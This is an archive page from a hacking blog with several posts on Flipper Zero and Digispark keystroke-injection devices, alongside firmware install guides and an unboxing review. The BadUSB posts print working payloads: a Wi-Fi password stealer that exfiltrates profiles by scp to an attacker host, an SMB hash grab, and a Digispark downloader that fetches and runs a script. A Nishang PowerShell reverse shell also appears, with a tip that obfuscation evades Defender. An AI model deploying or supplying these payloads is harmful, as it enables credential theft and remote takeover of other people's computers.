Hardware Archives

Stealing Passwords With The Flipper Zero

Posted on November 24, 2022November 24, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ, in this post I’m going to be stealing passwords with the Flipper Zero. A Bad USB attack is an attack that leverages the trust that computers have for USB devices like keyboards. We will use this attack to perform keystroke injection to carry out our evil intentions. Ok, it’s a purely educational post to show the dangers of such an attack. But also because Flipper Zero has a really cool UI for doing such attacks. The following payloads can all be found at https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. I take no credit for any of them.

Our First Flipper Zero BadUSB Payload

The first thing we’re going to do is create a payload that opens up a terminal and executes a command. For this, we’re going to be using Ducky Script which Is the native language of the Hak5 USB Rubber Ducky. The script below starts with a delay of 100. This is to ensure that the computer has recognized the device before executing the script. Then, it has a comment of “opens run”. Next, the script injects the Windows key (GUI) and the r key. This combination of keys opens the run dialog box. Then, there is another delay of 100 seconds before a string of text is injected. The text string is injected into the run box and tells the system to open a Powershell window.

The script then has a delay of 1000 to wait for the Powershell window to open. After, the script then injects a string telling Powershell to add the Assembly Name Presentation Framework. This framework is required for creating pop-up boxes. Next, the script injects enter followed by another delay and then another string. This string will create a pop-up box informing the user that they have been hacked.

DELAY 100
REM opens run
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Now, we need to save it as a text file and drop it into the BadUSB directory on the Flipper. Then, to test it, we need to close the Flipper desktop application. After that, connect the Flipper Zero again and navigate to the Bad USB payloads. Then, select the payload and run it.

Flipper BadUSB Browser Pranks

Granted the previous payload doesn’t really do anything. However, it does demonstrate that the Flipper can be used to launch a Powershell window and execute commands. With that in mind, we can leverage that ability to perform other types of pranks or attacks.

For example, wouldn’t it be fun if you could “instantly” Rick Roll someone by connecting to their computer? The script below sort of does that. As with the previous script, it first has a delay of 100 and then it launches the run dialog box. Then, it inserts a URL which the run box will open with the system’s default browser. Next, has another delay and then types the f key to make the video full screen. It then hits the F11 key to hide the URL and menu bars. Granted, it isn’t perfect. Some browsers don’t auto-play videos but you can tinker with it to make it better.

REM Rick Rolling
DELAY 100
REM opens run
GUI r
DELAY 100
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley
ENTER
DELAY 1000
f

Stealing Wi-Fi Passwords

Stealing Wi-Fi passwords is pretty simple with Flipper Zero. However, exfiltrating the Wi-Fi passwords from the victim’s system is where you may run into problems. You should definitely not use the method below. It’s dirty and quick and would allow anyone to find the password for your server. It uses SCP to upload the files to your server which requires authenticating. I’m using it as a quick way to demonstrate stealing Wi-Fi passwords. You should absolutely use something more secure such as sending the data via email or a POST request to a web server.

With the obvious out the way, this script launches a Windows Command Prompt and changes the directory to the temp directory. Next, it runs a command to export the Wi-Fi network settings for the access points remembered by the target. It spits these out as XML files in the %temp% directory. Next is where you should absolutely change the script. It uses SCP to transfer the files to the server. However, the server requires authentication so it adds a delay and then inputs the password of kali as a string.

Note that if this victim’s machine hasn’t spoken to your Kali server before then it will first need to accept the SSH disclaimer. This could be achieved by adding in another “ENTER” after the scp command and before the password is passed as a string.

REM Wifi password stealer
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM exports the wifi passwords as XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM copys the files to kali host
STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

The image below shows that the files have been successfully transferred to the Kali server using the SCP tool.

The screenshot below shows the output from using cat against the file. The highlighted section is the password for the access point called “Super Secure Access Point”. The password is [email protected] which a threat actor could now use to connect to the access point. Once on the network, they could get up to all sorts of nefarious things.

Stealing Windows Passwords Hashes

The next payload is taken directly from Hak5 and was a good attack against machines connected to a domain. Furthermore, it had the potential to allow you to steal Windows password hashes in a matter of seconds. It requires the use of the Impacket smbserver.py Python script.

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

The screenshot below illustrates stealing Windows password hashes using the USB Rubber Ducky payload above. As you can see the user joseph on the host authenticated successfully against the SMB server thus submitting the password hash to the server. This hash can now be taken offline and cracked.

For the full Hak5 write up please see the URL https://shop.hak5.org/blogs/usb-rubber-ducky/whats-the-quickest-way-to-steal-a-windows-password-hash. Hak5 also has an awesome write-up of using Mimikatz with the USB Rubber Ducky to steal Windows password hashes. I highly recommend giving it a read here https://shop.hak5.org/blogs/usb-rubber-ducky/15-second-password-hack-mr-robot-style.

Conclusions

I’m having a lot of fun with the Flipper Zero. The reason why I like the BadUSB feature so much is because of the user interface it provides. The fact that you have an easy-to-navigate user interface for selecting payloads makes it much more user-friendly. It allows you to store multiple payloads and select them easily which could be really useful for physical intrusion assessments. You could be in an environment that has Windows, Linux, and Apple machines. You could load your Flipper with various different payloads for various different operating systems and go nuts.

Making Flipper Zero Ultra with RogueMaster Firmware

Posted on October 9, 2022October 9, 2022 by Jonobi Musashi

Hello world and welcome to Haxez, in this post I’m going to be installing the RogueMaster Flipper Zero firmware. The RogueMaster firmware adds more functionality to the device by installing community applications. Installing the RogueMaster firmware is a fairly straightforward process. However, it is probably best to ensure you have updated and backed up your device first.

Updating The Flipper Zero

First, let’s update the device to the latest version. This can be done relatively quickly by installing the desktop application. You can download the application here and installing it is just a case of following the wizard. Once the application is installed, connect your device to it and look for the big green update button. Click the button and wait for the installation process to complete.

Back-Up The Flipper Zero

You should back up your device by heading to the spanner tab and clicking the backup button. When clicked, this button will spawn a Windows explorer window asking you where you want to save your backup. Then, choose a safe location on your computer and click save. Now that you have updated and backed up your device, it’s time to find the firmware.

Finding RogueMaster Firmware

The RogueMaster firmware can be found by performing a Google search for RogueMaster Firmware. In fact, the correct Github page should be first the result. Click the link and visit the page and then look for the correct repository.

Once there, look for the released section. It should be on the right-hand side of the page. While there should be three options, the one I’m going to be downloading is the .tgz file. However, this could be a .zip file depending on the current release. A .tgz file is an archiving format similar to .zip but you may need to install an additional tool like 7zip to extract it. Just right-click the downloaded file and select 7zip from the context menu, then select extract. You may need to extract the extracted file.

Uploading The Files

Once the tar.gz and tar files have been extracted, head to the Flipper desktop application and navigate to the SD card. Locate the update directory and navigate to it. Then, drag the extracted directory to the uploads directory. You may get an error message complaining that the files are too large. However, it is safe to ignore that message.

Installing The RogueMaster Firmware

Now that the files have been uploaded, head back to the main screen of the application and click on the Flipper Zero screen to expand it. Then, press the down button followed by the left button. That should allow you to browse the directories on the Flipper Zero including the update directory. From there, you should be able to navigate to the uploaded directory and locate the update package. Click on the package and select Run in app.

Flipper Zero Update Complete

If you successfully installed the firmware then you should get a lovely picture of Goku suggesting that the installation was successful. Furthermore, you should get a link to join the GitHub community. If you run into issues then just reinstall the default software and go back through the installation process.

Flipper Zero RogueMaster New Features

The RogueMaster firmware includes many new features including the Sub-GHz frequencies required to hack open the Tesla charge ports. There is also a vast selection of games including Doom, Flappy Bird, Tetris, and Tic Tac Toe. To list all of the features and their purposes would require devoting an entire blog post. Feel free to check out my video where I go into a bit more detail.

Unleashing the power of the Flipper Zero

Posted on October 1, 2022October 1, 2022 by Jonobi Musashi

Hello world and welcome to Haxez, today we’re unleashing the power of the Flipper Zero by installing custom firmware. However, the first thing we need to do is ensure that the flipper is up to date. Therefore, head to the following URL and download the updater. Disclaimer, I’m not affiliated with the makers of the Flipper Zero in any way, nor is this sponsored. I’m merely making content for it because I like the device.

Updating Flipper Zero

Once the Flipper Zero desktop software is downloaded, launch it from the icon. Then, connect your Flipper Zero to your computer via the supplied USB C cable. The application should automatically detect the version of firmware that you have installed. If you’re up to date then you can skip this step. However, if you’re out of date then proceed and click the install button.

Backing Up Flipper Zero

Next, it is probably a good idea to back up your device. This can be accomplished fairly easily by clicking on the spanner menu button. There, you will have a number of options including backup, restore, erase and check for updates. All you need to do is click the backup button and save the file that it creates to a safe location.

According to the Flipper blog, the firmware update process is fairly bulletproof. However, whenever you’re updating firmware whether it’s your BIOS or you’re rooting a phone, you need to be careful. If the device was to lose power while the new firmware is being written, it could brick your device. The Flipper device seems to have a method for updating the firmware whereby the old firmware remains on the device until the firmware is installed.

Finding Custom Firmware

Now that you have updated your Flipper and have taken a backup, it’s time to find some custom Firmware. The firmware that I’m going to be installing is called the unleashed firmware by Eng1n33r. This firmware is easy to install and has a number of different additional features. Notably, the firmware includes some community applications that provide functionality like fuzzing. Furthermore, there are some games including Doom.

Downloading Custom Firmware

In order to download the custom firmware, head to the releases page on Github. There, you will see a link to a .tgz file. Click the link and save the file to a safe location on your computer. Please be advised that there is a web installer that can simplify the installation process. However, when I attempted to use the web updater it didn’t work. You need to use a Chromium-based browser but I think I had problems due to the firmware version I had installed.

Installing Flipper Zero Custom Firmware

In order to install the custom firmware, all you need to do is head back to the Flipper Desktop application. Back on the settings page, you will find an option to install from the file. Click that option and navigate to the .tgz file that you just downloaded. The desktop application will then switch to a progress bar showing you the installation progress.

Once the Flipper desktop application reaches 100% it should prompt you to say to follow along on the Flipper Zero device itself. After a few minutes, you should get a notification that the Unleashed firmware has been installed successfully. It should look similar to the image below.

Unleashed Firmware Successfully Installed

Unleashed Firmware Features

I’m not going to go into all the features of the firmware in this post. Perhaps, this is something I will write another post and create another video on at a later date. It is packed with new apps including games though. If you fancy playing a bit of Doom, Tetris, or Flappy Bird in between your hacking activities then you now have the option to do that. You can see the full list of features on this page.

Conclusions

This post wasn’t meant to be a full breakdown of all the different features of the Unleashed Firmware. That is something I may go into more at a later date. The purpose of this post was to explain how to locate and safely install custom firmware. The developer has great installation instructions on their GitHub page so this article may be redundant but I wanted to create one. I’m enjoying using the unleashed firmware. It adds some great functionality. However, I will probably be looking at moving to the Roguemaster firmware in the near future.

Hack all the things with the Flipper Zero. Unboxing, Updating, and Playing

Posted on September 11, 2022September 11, 2022 by Jonobi Musashi

Hello world and welcome to Haxez. Recently, I was lucky enough to have my Flipper Zero delivered. If you don’t know what the Flipper Zero is then you should absolutely check it out. In their own words, it is a Swiss army knife for hackers. It has many different features including a cute dolphin Tamagotchi.

Unboxing the Flipper Zero

The Flipper Zero comes in a neat cardboard box with some cool graphics. The box was sealed with tape which was easily dispatched with a knife. Opening the box, you are presented with the instruction manual document. Underneath the manual is a foam housing protecting a USB C cable. Then, underneath the foam USB C holder is the glorious Flipper Zero. Not much more to say about it than that.

Updating The Flipper Zero

Updating the device was relatively simple. In fact, all I had to do was visit the software URL and download the installed. Once the software was installed, I connected the device to my laptop and it instantly recognized it. As can be seen from the image below, the interface is great and it has an obvious Update button. In summary, the update process took about 10 minutes with most of that time taken up by writing the firmware to the device.

NFC Hacking

The device has the ability to clone and simulate NFC or near-field communication signals. Instantly, I decided to check this out by cloning the fob I used to enter my flat. Overall, the process was straightforward and worked like a charm. In short, you select NFC from the menu and then select read. Then, save the NFC signal to the device and use the simulate option to send the signal. Suddenly, the door unlocked and I was into my building.

BadUSB

The device also has a built-in BadUSB. To explain, a BadUSB is a device that can emulate keyboard input. Darren Kitchen from Hak5 brought this weakness of trusted devices to the attention of the hacker community when they released the USB Rubber Ducky. Since then, it has been a viable attack vector to quickly execute commands on a host that you have physical access to. It was really intuitive to use, just plug in the device and select the payload from the menu and it executes it.

Infrared

I used to have an infrared light on my mobile phone and I thought it was the coolest thing ever. Being able to change channels on anyone’s TV gave me a silly sense of power. Since then, I have upgraded and lost that functionality. However, that power has now been restored with the Flipper Zero. After applying the update you get access to a universal remote control which you can use to control the universe… wait I mean TV’s and other infrared devices.

Conclusions

I love this device and can’t wait to test out more of its functionality. I definitely need to get the Wifi development breakout board to do some Wifi shenanigans but so far I’ve had a lot of fun with it. Unfortunately, I couldn’t get it to work with my car’s central locking. While the device reads the signal fine, sending it to the car does nothing. I suspect this has something to do with the rolling key security mechanism built into car keys but I digress. Anyway, this was a quick review of the Flipper Zero, so far so awesome. I can’t wait to experiment with the massive amount of features. I have barely scrapped the surface.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Posted on July 12, 2022July 12, 2022 by Jonobi Musashi

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases

Digispark Payloads

Now that you’re Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds. 
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your download payload. Then set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will only likely work with Defender disabled unless you have modified your payload. However, please see the video below of a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.